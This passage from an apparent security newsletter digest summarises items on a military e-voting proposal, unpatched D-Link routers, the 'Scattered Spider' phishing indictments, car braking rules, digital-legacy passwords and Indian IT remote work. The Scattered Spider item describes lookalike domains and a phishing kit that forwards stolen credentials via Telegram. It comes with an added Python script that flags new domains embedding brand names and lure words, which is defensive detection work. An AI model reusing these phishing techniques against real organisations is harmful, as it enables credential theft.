Though this happens rarely, should a company see a need to fork the project for long-term customer welfare, having core contributors and maintainers positions them to succeed with a fork.

 

DARPA-backed voting system for soldiers abroad savaged
A proposed system – dubbed CACvote in reference to military smart ID cards called "Common Access Cards" – consists of four elements: voting kiosks at military bases for military personnel; a computer system that receives ballots from those kiosks; a cryptographic protocol for encoding and transmitting ballots, which also get printed and mailed; and a risk-limiting audit (RLA) protocol intended to detect integrity violations (eg, hacking) that alter an election outcome, and to correct the outcome.
The consensus of election security experts is that electronically returned ballots are vulnerable to large-scale remote attacks and manipulation. To illustrate this point, various electronic voting systems have been found to be insecure in Washington, DC, in Estonia, in Australia, and in Switzerland, as well as the Voatz and Democracy Live systems.
According to an analysis paper from Andrew Appel, professor of computer science at Princeton University, and Philip Stark, professor of statistics at UC Berkeley, CACvote "contains interesting ideas that are not inherently unsound" but isn't realistic given the legal, institutional, and practical changes necessary to make it work.
MERGE, they observe, makes unrealistic demands on voters to check cryptographic signatures, look up those signatures on a public bulletin board several days after casting a vote, and then check to make sure their printed paper ballot reflects their touchscreen voting choices.

 

D-Link tells users to trash old VPN routers over bug too dangerous to identify
Vendor offers 20% discount on new model, but not patches
[rG: Check all your home and business networking gear for End of Support dates, and then add a calendar reminder to replace.]

 

 
LEGAL & REGULATORY
Feds Charge Five Men in ‘Scattered Spider’ Roundup
Federal prosecutors in Los Angeles this week unsealed criminal charges against five men alleged to be members of a hacking group responsible for dozens of cyber intrusions at major U.S. technology companies between 2021 and 2023, including LastPass, MailChimp, Okta, T-Mobile and Twilio.
The targeted SMS scams asked employees to click a link and log in at a website that mimicked their employer’s Okta authentication page. Some SMS phishing messages told employees their VPN credentials were expiring and needed to be changed; other phishing messages advised employees about changes to their upcoming work schedule.
These attacks leveraged newly-registered domains that often included the name of the targeted company, such as twilio-help[.]com and ouryahoo-okta[.]com. The phishing websites were normally kept online for just one or two hours at a time, meaning they were often yanked offline before they could be flagged by anti-phishing and security services.
The phishing kits used for these campaigns featured a hidden Telegram instant message bot that forwarded any submitted credentials in real-time. The bot allowed the attackers to use the phished username, password and one-time code to log in as that employee at the real employer website.
If convicted, each defendant would face a statutory maximum sentence of 20 years in federal prison for conspiracy to commit wire fraud, up to five years in federal prison for the conspiracy count, and a mandatory two-year consecutive prison sentence for aggravated identity theft.
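Because the phishing sites described above stayed online for only an hour or two, blocklists arrive too late; watching new domain registrations for embedded brand names is one way to catch them earlier. The following is an added example, not code from the article or the indictment: it triages a new-registration feed, and the lure word list, the seven-day age window, the registration dates, the `.example` domains and all function names are assumptions.

```python
import re
from datetime import date

# Assumed lure vocabulary (hypothetical): identity-provider and helpdesk words.
LURE_WORDS = {"okta", "sso", "vpn", "help", "helpdesk", "login"}

def refang(domain):
    """Normalise a possibly defanged domain such as twilio-help[.]com."""
    return domain.strip().lower().replace("[.]", ".").rstrip(".")

def triage(records, brands, own_domains, today, max_age_days=7):
    """Return newly registered domains that embed a protected brand name.

    records: iterable of (domain, registration_date) from a new-domain feed.
    """
    hits = []
    for raw, registered in records:
        domain = refang(raw)
        # Skip the organisation's own domains and their subdomains.
        if any(domain == o or domain.endswith("." + o) for o in own_domains):
            continue
        name = domain.rsplit(".", 1)[0]  # naive: drops only the last label
        brand = next((b for b in brands if b in name), None)
        age = (today - registered).days
        if brand is None or not 0 <= age <= max_age_days:
            continue
        # Lure words are matched on whole hyphen/dot tokens to limit noise.
        lures = sorted(LURE_WORDS & set(re.split(r"[-.]", name)))
        hits.append({"domain": domain, "brand": brand, "age_days": age,
                     "lures": lures,
                     "severity": "high" if lures else "review"})
    return hits

# Constructed sample feed; registration dates are invented for illustration.
TODAY = date(2024, 11, 23)
BRANDS = ["twilio", "yahoo"]
OWN_DOMAINS = {"twilio.com", "yahoo.com"}
SAMPLE = [
    ("twilio-help[.]com", date(2024, 11, 22)),       # pattern named in the article
    ("ouryahoo-okta[.]com", date(2024, 11, 23)),     # pattern named in the article
    ("status.twilio.com", date(2024, 11, 22)),       # own subdomain, ignored
    ("garden-supplies.example", date(2024, 11, 22)), # new but no brand
    ("twilio-fans.example", date(2019, 5, 1)),       # brand but old registration
    ("yahoo-recipes.example", date(2024, 11, 21)),   # brand, no lure word
]

if __name__ == "__main__":
    for hit in triage(SAMPLE, BRANDS, OWN_DOMAINS, TODAY):
        print(hit)
```

Brand matching is by substring so that `ouryahoo-okta` is caught, which also means short brand names will need an exclusion list to keep false positives manageable.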

 

Automatic Braking Systems Save Lives. Now They’ll Need to Work at 62 MPH
One industry group estimates that US automakers' move to install AEB on most cars—something they did voluntarily, in cooperation with road safety advocates—will prevent 42,000 crashes and 20,000 injuries by 2025.
AAA researchers tested three model year 2018 and 2017 vehicles versus three model year 2024 vehicles, and found the AEB systems in the newer cars were twice as likely as the old systems to avoid collisions at speeds up to 35 miles per hour. In fact, the new systems avoided all of the tested collisions at speeds between 12 and 35 mph. The majority of the newer cars avoided hitting a non-moving target at 45 mph, too.
Earlier this year, the US National Highway Traffic Safety Administration, which crafts the country’s road safety rules, announced that by 2029, it will require all cars to be able to stop and avoid contact with any vehicle in front of them at even faster speeds: 62 mph. The Feds will also require automakers to build AEB systems that can detect pedestrians in the daytime and at night. And automakers will have to build tech that applies brakes automatically at speeds up to 45 mph when it senses an imminent collision with a person, and 90 mph when it senses one with a car.
The government estimated that installing more advanced AEB systems on its cars would cost an additional $350 per vehicle. The auto lobbying group estimates prices could range up to $4,200 per car instead, and it has filed a petition to request changes to the final federal rules.

 

Put your usernames and passwords in your will, advises Japan's government
The Center's somewhat maudlin advice is motivated by recent incidents in which citizens struggled to cancel subscriptions their loved ones signed up for before their demise, because they didn't know their usernames or passwords. The resulting "digital legacy" can be unpleasant to resolve, the agency warns, so it suggested four steps to ensure our digital legacies aren't complicated.
Some entrepreneurs have already identified end of life services as an opportunity. "Dead Man's Switch" apps can be set to contact whomever you choose if you do not sign in to certain accounts after a period you select as a likely indicator of your departure from this world. Meta/Facebook also offers the chance to nominate a "legacy contact" who can manage your account.
[rG: Look for “Legacy Account” settings in password/credential management applications.]

 

And Now For Something Completely Different …
Every Noise At Once: Dangerous time suck for music lovers – explore all music genres on Spotify: click on genre to hear sample, then click on double chevrons for drill down artists, discography, and play on Spotify.

 

 

The end of remote work
It doesn’t matter if you’re a remote work advocate or naysayer. If you’re on either extreme of the spectrum, your news feed will often have blurbs about how a large company is bringing people back to the office. Such news bytes make us feel like everyone’s getting back to the office. But as I’ve explained earlier on this site, the news focuses on a quarter of the industry - i.e. the WITCH and TAMMANA - and ignores everyone else.

Are you “that” company?
In India, IT is a major industry. It employs about five million workers. But if you ask people to name the biggest IT companies, they’ll name five, which for better or worse, go by the acronym WITCH - Wipro, Infosys, TCS, Cognizant and HCL. Between these companies, they employ 1.35 million workers in India - TCS being the largest at 450,000 employees and HCL being the “smallest” at 150,000 employees. All these companies primarily provide IT services.
The other big companies are the usual suspects. These are the big boys of tech; earlier known as FAANG and who I now refer to as TAMMANA - Tesla (for Twitter, now X), Alphabet, Meta, Microsoft, Amazon, Netflix and Apple. Between them, they employ about 36,500 people. Alphabet, Amazon, and Microsoft employ about 10,000 people each and the remaining companies in this list employ smaller numbers of people, with Netflix making a token presence at 500 employees.
We must all realise that these 12 big companies are nothing like the rest of the industry.
Aside from these behemoths, there are 25,000 IT companies in India. Together, those 25,000 companies employ about 3.65 million people. A simple average will tell you that the average IT company employs about 145 workers. Netflix - the smallest of the big boys - employs 3.5x that number of people! So the next time you read an RTO story in the press, ask yourself if the story comes from 12 big boys or from 25,000 companies that represent the rest of the industry.